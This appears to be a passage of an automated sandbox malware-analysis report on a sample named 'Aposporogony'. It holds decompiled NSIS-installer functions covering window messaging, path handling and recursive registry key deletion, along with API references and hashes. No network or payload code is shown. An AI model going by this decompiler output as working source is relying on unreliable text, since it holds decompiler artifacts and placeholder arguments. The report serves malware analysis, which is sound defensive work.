                                                                                                                                                                                      					 *((intOrPtr*)(__ebp - 0x10)) = E00402C41(0x33);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				__eflags =  *(_t64 - 0x14) & 0x00000002;
                                                                                                                                                                                      				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
                                                                                                                                                                                      					 *(_t64 + 8) = E00402C41(0x44);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
                                                                                                                                                                                      				_push(1);
                                                                                                                                                                                      				if(__eflags != 0) {
                                                                                                                                                                                      					_t59 = E00402C41();
                                                                                                                                                                                      					_t32 = E00402C41();
                                                                                                                                                                                      					asm("sbb ecx, ecx");
                                                                                                                                                                                      					asm("sbb eax, eax");
                                                                                                                                                                                      					_t35 =  ~( *_t31) & _t59;
                                                                                                                                                                                      					__eflags = _t35;
                                                                                                                                                                                      					_t36 = FindWindowExW( *(_t64 - 0x10),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_t61 = E00402C1F();
                                                                                                                                                                                      					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
                                                                                                                                                                                      					_t41 = E00402C1F(2);
                                                                                                                                                                                      					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
                                                                                                                                                                                      					_t56 =  *(_t64 - 0x14) >> 2;
                                                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                                                      						_t36 = SendMessageW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8));
                                                                                                                                                                                      						L10:
                                                                                                                                                                                      						 *(_t64 - 0x30) = _t36;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t42 = SendMessageTimeoutW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8), _t46, _t56, _t64 - 0x30);
                                                                                                                                                                                      						asm("sbb eax, eax");
                                                                                                                                                                                      						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
                                                                                                                                                                                      				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
                                                                                                                                                                                      					_push( *(_t64 - 0x30));
                                                                                                                                                                                      					E0040632F();
                                                                                                                                                                                      				}
                                                                                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}















                                                                                                                                                                                      0x00401c1f
                                                                                                                                                                                      0x00401c21
                                                                                                                                                                                      0x00401c28
                                                                                                                                                                                      0x00401c2b
                                                                                                                                                                                      0x00401c2e
                                                                                                                                                                                      0x00401c38
                                                                                                                                                                                      0x00401c3c
                                                                                                                                                                                      0x00401c3f
                                                                                                                                                                                      0x00401c48
                                                                                                                                                                                      0x00401c48
                                                                                                                                                                                      0x00401c4b
                                                                                                                                                                                      0x00401c4f
                                                                                                                                                                                      0x00401c58
                                                                                                                                                                                      0x00401c58
                                                                                                                                                                                      0x00401c5b
                                                                                                                                                                                      0x00401c5f
                                                                                                                                                                                      0x00401c61
                                                                                                                                                                                      0x00401cb6
                                                                                                                                                                                      0x00401cb8
                                                                                                                                                                                      0x00401cc3
                                                                                                                                                                                      0x00401ccd
                                                                                                                                                                                      0x00401cd0
                                                                                                                                                                                      0x00401cd0
                                                                                                                                                                                      0x00401cd9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00401c63
                                                                                                                                                                                      0x00401c6a
                                                                                                                                                                                      0x00401c6c
                                                                                                                                                                                      0x00401c6f
                                                                                                                                                                                      0x00401c75
                                                                                                                                                                                      0x00401c7c
                                                                                                                                                                                      0x00401c7f
                                                                                                                                                                                      0x00401ca7
                                                                                                                                                                                      0x00401cdf
                                                                                                                                                                                      0x00401cdf
                                                                                                                                                                                      0x00401c81
                                                                                                                                                                                      0x00401c8f
                                                                                                                                                                                      0x00401c97
                                                                                                                                                                                      0x00401c9a
                                                                                                                                                                                      0x00401c9a
                                                                                                                                                                                      0x00401c7f
                                                                                                                                                                                      0x00401ce2
                                                                                                                                                                                      0x00401ce5
                                                                                                                                                                                      0x00401ceb
                                                                                                                                                                                      0x00402a6b
                                                                                                                                                                                      0x00402a6b
                                                                                                                                                                                      0x00402ac8
                                                                                                                                                                                      0x00402ad4

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                                                                                      • String ID: !
                                                                                                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                                                                                                      • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                                                                                                      • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                                                                                                      • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                                                                                                      • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 58%
                                                                                                                                                                                      			E00405CBD(WCHAR* _a4) {
                                                                                                                                                                                      				WCHAR* _t9;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t9 = _a4;
                                                                                                                                                                                      				_push( &(_t9[lstrlenW(_t9)]));
                                                                                                                                                                                      				_push(_t9);
                                                                                                                                                                                      				if( *(CharPrevW()) != 0x5c) {
                                                                                                                                                                                      					lstrcatW(_t9, 0x40a014);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				return _t9;
                                                                                                                                                                                      			}




                                                                                                                                                                                      0x00405cbe
                                                                                                                                                                                      0x00405ccb
                                                                                                                                                                                      0x00405ccc
                                                                                                                                                                                      0x00405cd7
                                                                                                                                                                                      0x00405cdf
                                                                                                                                                                                      0x00405cdf
                                                                                                                                                                                      0x00405ce7

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77273420,004036EF,?,00000006,00000008,0000000A), ref: 00405CC3
                                                                                                                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77273420,004036EF,?,00000006,00000008,0000000A), ref: 00405CCD
                                                                                                                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDF
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CBD
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                      • API String ID: 2659869361-3355392842
                                                                                                                                                                                      • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                                                                      • Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
                                                                                                                                                                                      • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                                                                      • Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                                                                      			E00402D44(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                      				short _v532;
                                                                                                                                                                                      				void* _t19;
                                                                                                                                                                                      				signed int _t25;
                                                                                                                                                                                      				intOrPtr* _t27;
                                                                                                                                                                                      				signed int _t32;
                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                      				signed int _t34;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t33 = _a12;
                                                                                                                                                                                      				_t34 = _t33 & 0x00000300;
                                                                                                                                                                                      				_t32 = _t33 & 0x00000001;
                                                                                                                                                                                      				_t19 = E00406255(__eflags, _a4, _a8, _t34 | 0x00000008,  &_v8);
                                                                                                                                                                                      				if(_t19 == 0) {
                                                                                                                                                                                      					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
                                                                                                                                                                                      						__eflags = _t32;
                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                      							RegCloseKey(_v8);
                                                                                                                                                                                      							return 0x3eb;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t25 = E00402D44(__eflags, _v8,  &_v532, _a12);
                                                                                                                                                                                      						__eflags = _t25;
                                                                                                                                                                                      						if(_t25 != 0) {
                                                                                                                                                                                      							break;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					RegCloseKey(_v8);
                                                                                                                                                                                      					_t27 = E004067C2(3);
                                                                                                                                                                                      					if(_t27 == 0) {
                                                                                                                                                                                      						return RegDeleteKeyW(_a4, _a8);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					return  *_t27(_a4, _a8, _t34, 0);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				return _t19;
                                                                                                                                                                                      			}











                                                                                                                                                                                      0x00402d4f
                                                                                                                                                                                      0x00402d58
                                                                                                                                                                                      0x00402d61
                                                                                                                                                                                      0x00402d6d
                                                                                                                                                                                      0x00402d74
                                                                                                                                                                                      0x00402d98
                                                                                                                                                                                      0x00402d7e
                                                                                                                                                                                      0x00402d80
                                                                                                                                                                                      0x00402dd3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00402dd9
                                                                                                                                                                                      0x00402d8f
                                                                                                                                                                                      0x00402d94
                                                                                                                                                                                      0x00402d96
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00402d96
                                                                                                                                                                                      0x00402db2
                                                                                                                                                                                      0x00402dba
                                                                                                                                                                                      0x00402dc1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00402de6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00402dcc
                                                                                                                                                                                      0x00402df0

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Close$Enum
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 464197530-0
                                                                                                                                                                                      • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                                                                                                      • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                                                                                                      • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 53%
                                                                                                                                                                                      			E00405DC5(void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                      				int _t11;
                                                                                                                                                                                      				signed char* _t12;
                                                                                                                                                                                      				intOrPtr _t18;
                                                                                                                                                                                      				intOrPtr* _t21;
                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                      
                                                                                                                                                                                      				E004063E8(0x425f30, _a4);
                                                                                                                                                                                      				_t21 = E00405D68(0x425f30);
                                                                                                                                                                                      				if(_t21 != 0) {
                                                                                                                                                                                      					E0040667C(_t21);
                                                                                                                                                                                      					if(( *0x42a25c & 0x00000080) == 0) {
                                                                                                                                                                                      						L5:
                                                                                                                                                                                      						_t23 = _t21 - 0x425f30 >> 1;
                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                      							_t11 = lstrlenW(0x425f30);
                                                                                                                                                                                      							_push(0x425f30);
                                                                                                                                                                                      							if(_t11 <= _t23) {
                                                                                                                                                                                      								break;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t12 = E0040672B();
                                                                                                                                                                                      							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                                                                                                                                      								E00405D09(0x425f30);
                                                                                                                                                                                      								continue;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								goto L1;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      						E00405CBD();
                                                                                                                                                                                      						return 0 | GetFileAttributesW(??) != 0xffffffff;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t18 =  *_t21;
                                                                                                                                                                                      					if(_t18 == 0 || _t18 == 0x5c) {
                                                                                                                                                                                      						goto L1;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						goto L5;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				L1:
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}








                                                                                                                                                                                      0x00405dd1
                                                                                                                                                                                      0x00405ddc
                                                                                                                                                                                      0x00405de0
                                                                                                                                                                                      0x00405de7
                                                                                                                                                                                      0x00405df3
                                                                                                                                                                                      0x00405e03
                                                                                                                                                                                      0x00405e05
                                                                                                                                                                                      0x00405e1d
                                                                                                                                                                                      0x00405e1e
                                                                                                                                                                                      0x00405e25
                                                                                                                                                                                      0x00405e26
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405e09
                                                                                                                                                                                      0x00405e10
                                                                                                                                                                                      0x00405e18
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405e10
                                                                                                                                                                                      0x00405e28
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405e3c
                                                                                                                                                                                      0x00405df5
                                                                                                                                                                                      0x00405dfb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405dfb
                                                                                                                                                                                      0x00405de2
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,77272EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,77272EE0,00000000), ref: 00405D76
                                                                                                                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                                                                                                      • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,77272EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,77272EE0,00000000), ref: 00405E1E
                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,77272EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,77272EE0), ref: 00405E2E
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                      • String ID: 0_B
                                                                                                                                                                                      • API String ID: 3248276644-2128305573
                                                                                                                                                                                      • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                                                                                                      • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                                                                                                      • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                                                                                                      • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                                                                      			E004053C4(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                                                                                      				int _t15;
                                                                                                                                                                                      				long _t16;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t15 = _a8;
                                                                                                                                                                                      				if(_t15 != 0x102) {
                                                                                                                                                                                      					if(_t15 != 0x200) {
                                                                                                                                                                                      						_t16 = _a16;
                                                                                                                                                                                      						L7:
                                                                                                                                                                                      						if(_t15 == 0x419 &&  *0x423714 != _t16) {
                                                                                                                                                                                      							_push(_t16);
                                                                                                                                                                                      							_push(6);
                                                                                                                                                                                      							 *0x423714 = _t16;
                                                                                                                                                                                      							E00404D9A();
                                                                                                                                                                                      						}
                                                                                                                                                                                      						L11:
                                                                                                                                                                                      						return CallWindowProcW( *0x42371c, _a4, _t15, _a12, _t16);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if(IsWindowVisible(_a4) == 0) {
                                                                                                                                                                                      						L10:
                                                                                                                                                                                      						_t16 = _a16;
                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t16 = E00404D1A(_a4, 1);
                                                                                                                                                                                      					_t15 = 0x419;
                                                                                                                                                                                      					goto L7;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				if(_a12 != 0x20) {
                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				E004043AB(0x413);
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}





                                                                                                                                                                                      0x004053c8
                                                                                                                                                                                      0x004053d2
                                                                                                                                                                                      0x004053ee
                                                                                                                                                                                      0x00405410
                                                                                                                                                                                      0x00405413
                                                                                                                                                                                      0x00405419
                                                                                                                                                                                      0x00405423
                                                                                                                                                                                      0x00405424
                                                                                                                                                                                      0x00405426
                                                                                                                                                                                      0x0040542c
                                                                                                                                                                                      0x0040542c
                                                                                                                                                                                      0x00405436
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405444
                                                                                                                                                                                      0x004053fb
                                                                                                                                                                                      0x00405433
                                                                                                                                                                                      0x00405433
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405433
                                                                                                                                                                                      0x00405407
                                                                                                                                                                                      0x00405409
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405409
                                                                                                                                                                                      0x004053d8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004053df
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                                                                                                        • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
